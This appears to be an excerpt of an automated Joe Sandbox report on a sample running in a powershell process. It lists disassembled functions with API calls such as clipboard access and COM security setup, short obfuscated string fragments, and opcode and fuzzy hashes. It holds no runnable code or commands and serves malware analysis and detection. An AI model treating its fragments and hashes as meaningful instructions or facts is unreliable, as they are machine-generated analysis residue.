                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                        Function 00461715 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 461715-46174b 1 46174d-461750 0->1 2 461752-461791 1->2 3 461793-461901 SysAllocString 1->3 2->1 4 461903-461906 3->4 5 46193e-461980 4->5 6 461908-46193c 4->6 8 46198a-4619c2 5->8 6->4
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: AllocString
                                                                        • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                        • API String ID: 2525500382-534244583
                                                                        • Opcode ID: 2ce2d5a4fd806df8d122eac7ffba045802158decf73c3423036a285e2193459d
                                                                        • Instruction ID: a55d376861d6f4950782cea4ae684df1a7fef43db6c9c1b57c78e7a4a566015c
                                                                        • Opcode Fuzzy Hash: 2ce2d5a4fd806df8d122eac7ffba045802158decf73c3423036a285e2193459d
                                                                        • Instruction Fuzzy Hash: E981E52010CBD289D326C63C881875FBFD15BE7224F184B9DE1F98B3E6D6A98146C767
                                                                        Function 00460758 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 359 460758-46089a SysAllocString 360 46089c-46089f 359->360 361 4608a1-4608c6 360->361 362 4608c8-46090a 360->362 361->360 364 460914-46093a 362->364
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: AllocString
                                                                        • String ID: 0
                                                                        • API String ID: 2525500382-4108050209
                                                                        • Opcode ID: c1cd37f678ce3bd96c6b2380b67faf0632c3ade6ccfd034359754083e622b75b
                                                                        • Instruction ID: 3945ae91e0a56777fa78a3ce180885babe1cea36124e33143537ffd1d37fe0dc
                                                                        • Opcode Fuzzy Hash: c1cd37f678ce3bd96c6b2380b67faf0632c3ade6ccfd034359754083e622b75b
                                                                        • Instruction Fuzzy Hash: 8271B260008BD28EC366CB3D89489057FA16B6B230B4A87D8E0FA4F7F7D265D506C766
                                                                        Function 00466145 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 611 466145-466186 call 46dbf0 GetUserDefaultUILanguage 614 466188-46618b 611->614 615 4661cd-4661f8 614->615 616 46618d-4661cb 614->616 616->614
                                                                        APIs
                                                                        • GetUserDefaultUILanguage.KERNELBASE ref: 00466165
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: DefaultLanguageUser
                                                                        • String ID:
                                                                        • API String ID: 95929093-0
                                                                        • Opcode ID: f0f82f11c964cbfacb3a2409e88ad499644ad0a7da1679753c960940f4408f0e
                                                                        • Instruction ID: 0662fc05e614ebf11c85d336fb261880c3e7e902f9c8f39ddf15176636ff2985
                                                                        • Opcode Fuzzy Hash: f0f82f11c964cbfacb3a2409e88ad499644ad0a7da1679753c960940f4408f0e
                                                                        • Instruction Fuzzy Hash: 1C115B32D052958FDB14CB3D8C542ADBF725F86320F0983EDD8A9A33D5D9344E428B51
                                                                        Function 0046C2C8 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetForegroundWindow.USER32 ref: 0046CCAF
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: ForegroundWindow
                                                                        • String ID:
                                                                        • API String ID: 2020703349-0
                                                                        • Opcode ID: 5d5bf2f1fe84cd1614c78e54595e02204bc339245b6ecff1c98ec81ba96bb315
                                                                        • Instruction ID: d0ca4ccebdc7cbef3fcfe33be9533cbb3642935a5c1fc9e33ba65c918074786a
                                                                        • Opcode Fuzzy Hash: 5d5bf2f1fe84cd1614c78e54595e02204bc339245b6ecff1c98ec81ba96bb315
                                                                        • Instruction Fuzzy Hash: 4EF04C75D105408BD7144BA4CC821E57BE1D75E320718847DD881D3344D53C5847CB5E
                                                                        Function 0046C180 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0043B2E4,00000000,00000001), ref: 0046C1B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: d861f97ea002e0ccccbb512df562eee0c3d3c2d884639823d1713d63f347bd59
                                                                        • Instruction ID: db9eecb81d53df73583e83004af4e3aa0275d5c0233d249992b489af79c5ba2b
                                                                        • Opcode Fuzzy Hash: d861f97ea002e0ccccbb512df562eee0c3d3c2d884639823d1713d63f347bd59
                                                                        • Instruction Fuzzy Hash: 15F02E72808611DBD2002F257C05D6B36649F86724F41487BFC0952161F73DD421D9AF
                                                                        Function 0046169A Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: BlanketProxy
                                                                        • String ID:
                                                                        • API String ID: 3890896728-0
                                                                        • Opcode ID: b2f12344a89832c60f147932c4b1b5bc32e394deb183853da3e061e4aead9799
                                                                        • Instruction ID: b2937c6afadc62340800d1875ed0bc654169aa0c2b885e2a21f0c91c6a48a9f1
                                                                        • Opcode Fuzzy Hash: b2f12344a89832c60f147932c4b1b5bc32e394deb183853da3e061e4aead9799
                                                                        • Instruction Fuzzy Hash: 79F09E74509342CFD3A4DF68C6A875BBBF1EB88348F01891CE4998B391DBB59548CF82
                                                                        Function 00460469 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: BlanketProxy
                                                                        • String ID:
                                                                        • API String ID: 3890896728-0
                                                                        • Opcode ID: 3731f439feed5cc2805b1d3654b0c6c7ee33769c913e91a1141f719304478941
                                                                        • Instruction ID: e380144c0765aae4dc803b7d416528ddcebd11129dbdc638fbb39b6efb3e2038
                                                                        • Opcode Fuzzy Hash: 3731f439feed5cc2805b1d3654b0c6c7ee33769c913e91a1141f719304478941
                                                                        • Instruction Fuzzy Hash: 76F0D4B05097019FD314DF29D16871ABBF4FB88304F01991CE49ACB390C7B5AA48CF82
                                                                        Function 0043C550 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0043C563
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: 154920d7b92f6804263b7fa13ff5e7453169094ed275278dbe5d4b2fcc05f8b9
                                                                        • Instruction ID: ef46ecbd0b2652d271016935f09adee919ff35f47e57877305261811bcb7b0d7
                                                                        • Opcode Fuzzy Hash: 154920d7b92f6804263b7fa13ff5e7453169094ed275278dbe5d4b2fcc05f8b9
                                                                        • Instruction Fuzzy Hash: C6D0A7B11602086BD2146B1DDC4BF62772CCB82766F40423DF3AFC61D1D9506A10DE79
                                                                        Function 0043C583 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0043C595
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeSecurity
                                                                        • String ID:
                                                                        • API String ID: 640775948-0
                                                                        • Opcode ID: b9a424dd30068394d7ff727bf646b25f7945a8b826f2dda336a1b3de8160cd39
                                                                        • Instruction ID: b94ae2530ea6e7b8c18572041fbc65ba25d54046df52600d9cb9d6d082206da5
                                                                        • Opcode Fuzzy Hash: b9a424dd30068394d7ff727bf646b25f7945a8b826f2dda336a1b3de8160cd39
                                                                        • Instruction Fuzzy Hash: D0D092B03D83007AF5748A18AC17F146210A741F56F740228B36AEE2E0C9D176419A0D
                                                                        Function 0046AAA0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,0046C1D6,?,0043B2E4,00000000,00000001), ref: 0046AABE
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: af0975c919e5cbf59c731dd03412569f64e7934ba6be178152c5a0f046b49cbb
                                                                        • Instruction ID: 2105170b59d2c5dd1337410cfce53ca802935e2a1b1e936b9d530b9e1ee918c3
                                                                        • Opcode Fuzzy Hash: af0975c919e5cbf59c731dd03412569f64e7934ba6be178152c5a0f046b49cbb
                                                                        • Instruction Fuzzy Hash: 77D01231905122EBC6102F25FC0AB8A3A5CEF0D760F4748B6B5046B071C665DCA186D8

                                                                        Non-executed Functions

                                                                        Function 00456B50 Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 439COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                                                        • API String ID: 0-3492884535
                                                                        • Opcode ID: d9f1bd6f62ca3b1208f2e4f9ae785d2b9ed3d42bbc339f699d0b34a48c37547b
                                                                        • Instruction ID: d5791fdc2a758c54886d0ac845c960638f125c834306c6507954b4afed647d85
                                                                        • Opcode Fuzzy Hash: d9f1bd6f62ca3b1208f2e4f9ae785d2b9ed3d42bbc339f699d0b34a48c37547b
                                                                        • Instruction Fuzzy Hash: 35E1FFB06083408FD7249F25E85176FBBF2FB85304F14896DE9D98B252E7788906CB4A
                                                                        Function 004629C0 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                        • String ID:
                                                                        • API String ID: 1006321803-0
                                                                        • Opcode ID: 6774b5b757d2e912220747d1265f438ee1b03c279f45d295807123b70ac97979
                                                                        • Instruction ID: b2bc754a35f0fa7882f22552aa7e11fe6b763e63edf18326b13c344be0c30a2e
                                                                        • Opcode Fuzzy Hash: 6774b5b757d2e912220747d1265f438ee1b03c279f45d295807123b70ac97979
                                                                        • Instruction Fuzzy Hash: A151F5B1908B429FD700AF78C54935EBFA0AB55310F04863ED89987391E3BCA95987D7
                                                                        Function 004612D1 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: AllocString
                                                                        • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                        • API String ID: 2525500382-534244583
                                                                        • Opcode ID: cea6d2566f20bb3968b509b873b98d39b4db095fd94cf5cc2eeeb4bae4327140
                                                                        • Instruction ID: 276beb9845615208dbd887737e2de671e305089d55911ddc3d6d191e551e3eba
                                                                        • Opcode Fuzzy Hash: cea6d2566f20bb3968b509b873b98d39b4db095fd94cf5cc2eeeb4bae4327140
                                                                        • Instruction Fuzzy Hash: C381D42010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727
                                                                        Function 0045E9ED Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit
                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                        • API String ID: 2610073882-1095711290
                                                                        • Opcode ID: e9732e2996dad07d23a706774c1d2e3e9d4c88af11b7ae4297f744a596ed9b06
                                                                        • Instruction ID: 53ee097486b4d6987d9692de0967fec84c533f3aa02b755eb556f65676df157e
                                                                        • Opcode Fuzzy Hash: e9732e2996dad07d23a706774c1d2e3e9d4c88af11b7ae4297f744a596ed9b06
                                                                        • Instruction Fuzzy Hash: 6E410721108BC1CED726CF388488646BFA16B66224F0886DDD8E54F3DBC775D51ACBA6
                                                                        Function 0045F833 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit
                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                        • API String ID: 2610073882-1095711290
                                                                        • Opcode ID: 0e754ac85cd33edb59c0c7e477481b436be638aaeda50931570e2d83ae456d18
                                                                        • Instruction ID: 8851c33aa07145806ab4c3ed7877cdcc5aadb6695e170048cf080c647a4e51ba
                                                                        • Opcode Fuzzy Hash: 0e754ac85cd33edb59c0c7e477481b436be638aaeda50931570e2d83ae456d18
                                                                        • Instruction Fuzzy Hash: D041E820108BC1CED726CF3C9498616BFA16B66224F088ADDD8E54F3DBC375D51ACB66
                                                                        Function 00462409 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: InitVariant
                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                        • API String ID: 1927566239-3011065302
                                                                        • Opcode ID: 0764ece9da1cc7123697acbd310458a51568a20d4cce59394cf655edbc5c0322
                                                                        • Instruction ID: 8b62f9263167b9c8bb81a8ee496587c80f5ede6909cec5055bdf4c6c4945f8f2
                                                                        • Opcode Fuzzy Hash: 0764ece9da1cc7123697acbd310458a51568a20d4cce59394cf655edbc5c0322
                                                                        • Instruction Fuzzy Hash: AE412A7010C7C18AD365DB28849878FBFE16B96314F885A9CF6E94B3E2C7798409CB57
                                                                        Function 00462194 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: InitVariant
                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                        • API String ID: 1927566239-3011065302
                                                                        • Opcode ID: cfc0bf81c427013ce12120a7b2a8c8bae1047a024551ee101d4de2463e782be1
                                                                        • Instruction ID: c755af8d035124c7edb9db2d3ef7628c783900841c039050b516b2c62f96883d
                                                                        • Opcode Fuzzy Hash: cfc0bf81c427013ce12120a7b2a8c8bae1047a024551ee101d4de2463e782be1
                                                                        • Instruction Fuzzy Hash: EB411A7000DBC19AD3659B28849874FBFE06B92314F885A9DF6E84B3E2C77984498757
                                                                        Function 00461EDD Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3465832704.0000000000431000.00000020.00000400.00020000.00000000.sdmp, Offset: 00430000, based on PE: true
                                                                        • Associated: 00000008.00000002.3465773346.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467599300.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.3467854398.0000000000482000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_430000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit
                                                                        • String ID: A$e$e$n$p$p$v$w$z$z
                                                                        • API String ID: 2610073882-1114116150
                                                                        • Opcode ID: f87d6afe498ecdfd82effa810afa59cc01d73d66de366016fe8ccc3ff40693d2
                                                                        • Instruction ID: 02b41fd119b99a5125a379563ff0f31db210002ab65144385a5b985fec6c9aa7
                                                                        • Opcode Fuzzy Hash: f87d6afe498ecdfd82effa810afa59cc01d73d66de366016fe8ccc3ff40693d2
                                                                        • Instruction Fuzzy Hash: 3541393160C7C18ED331CB38885879BBFD2ABA6324F088AADD4E9872D6D7794505C763